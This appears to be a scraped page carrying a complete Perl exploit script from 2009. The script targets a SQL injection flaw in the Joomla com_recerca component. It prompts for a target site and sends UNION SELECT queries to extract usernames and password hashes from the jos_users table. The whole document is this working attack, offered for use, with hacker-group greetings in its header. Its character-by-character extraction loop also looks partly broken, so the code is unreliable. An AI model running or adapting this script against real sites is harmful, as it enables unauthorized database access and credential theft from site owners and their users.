Get documents about "Joomla Recerca component SQL Injection
Document Sample
Joomla Recerca component SQL Injection Page 1/2
1 #!/usr/bin/perl
2
3 #=========================== [ root@indonesiancoder.com $ ~] ===========================#
4 # [~] Joomla Components com_recerca (ansubdepartments_id) SQL Injection Vulneralbility #
5 # [~] Author : Don Tukulesto #
6 # [~] Homepage : http://www.indonesiancoder.com #
7 # [~] Tune in : http://www.AntiSecradio.fm ( choose your weapon ) #
8 # [~] Gracias : IndonesianCoder.com − AntiSecurity.org − ServerIsDown.org − MainHack #
9 # [~] kaMtiEz, M3NW5, arianom, Jack−, Yadoy666, Gonzhack, SoulNet, s4va, tiw0L, Kill−9 #
10 # [~] SAINT, CYB3R_TR0N, M364TR0N, NoGe, TUCKER, Ian Petrucii, RoNz, Chercut, YOU !! #
11 #=========================== [ root@indonesiancoder.com $ ~] ===========================#
12
13
14 use HTTP::Request;
15 use LWP::UserAgent;
16
17 $cmsapp = ’Joomla Component com_recerca’;
18 $vuln = ’index.php?option=com_recerca&task=linia&ansubdepartments_id=’;
19 $column = ’concat(username,0x3a,password)tukulesto’;
20 $table = ’jos_users’;
21 $regexp = ’No elements defined’;
22 $maxlen = 65;
23
24 my $OS = "$^O";
25 if ($OS eq ’MSWin32’) { system("cls"); } else { system("clear"); }
26
27 printf "\n
28 $cmsapp
29 [x]====================================================[x]
30 | www[dot]IndonesianCoder[dot]com |
31 [x]====================================================[x]
32
33 \n";
34
35 print " [~] URL Path : "; chomp($web=<STDIN>);
36 print " [~] Valid ID : "; chomp($id=<STDIN>);
37 print " [~] Column : "; chomp($columns=<STDIN>);
38
39 if ($web =~ /http:\/\// ) { $target = $web."/"; } else { $target = "http://".$web."/"; }
40
41 print "\n\n [!] Exploiting $target ...\n\n";
42 &get_data;
43 print "\n\n [!] Exploit completed.\n\n";
44
45 sub get_data() {
46 @columns = split(/,/, $columns);
47 foreach $column (@columns) {
48 print " [exploiting\@$web] SELECT $column FROM $table please wait...\n";
49 syswrite(STDOUT, " [exploiting\@$web] $column\@$table > ", 255);
50 for (my $i=1; $i<=$maxlen; $i++) {
51 my $chr = 0;
52 my $found = 1;
Don Tukulesto 10/07/2009
Joomla Recerca component SQL Injection Page 2/2
53 my $char = 48;
54 while (!$chr && $char<=90) {
55 if(exploit($i,$char) !~ /$regexp/) {
56 $chr = 1;
57 $found = 1;
58 syswrite(STDOUT,chr($char),1);
59 } else { $found = 0; }
60 $char++;
61 }
62 if(!$chr) {
63 $char = 97;
64 while(!$chr && $char<=122) {
65 if(exploit($i,$char) !~ /$regexp/) {
66 $chr = 1;
67 $found = 1;
68 syswrite(STDOUT,chr($char),1);
69 } else { $found = 0; }
70 $char++;
71 }
72 }
73 if (!$found) {
74 print "\n"; last;
75 }
76 }
77 }
78 }
79
80 sub exploit() {
81 my $limit = $_[0];
82 my $chars = $_[1];
83 my $shits = ’+union+select+1,2,3,’.$column.’,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+’.$table.’−−’;
84 my $inject = $target.$vuln.$id.$shits;
85 my $content = get_content($inject);
86 return $content;
87 }
88
89 sub get_content() {
90 my $url = $_[0];
91 my $req = HTTP::Request−>new(GET => $url);
92 my $ua = LWP::UserAgent−>new();
93 $ua−>timeout(15);
94 my $res = $ua−>request($req);
95 if ($res−>is_error){
96 print "\n\n [!] Error, ".$res−>status_line.".\n\n";
97 exit;
98 }
99 return $res−>content;
100 }
Don Tukulesto 10/07/2009
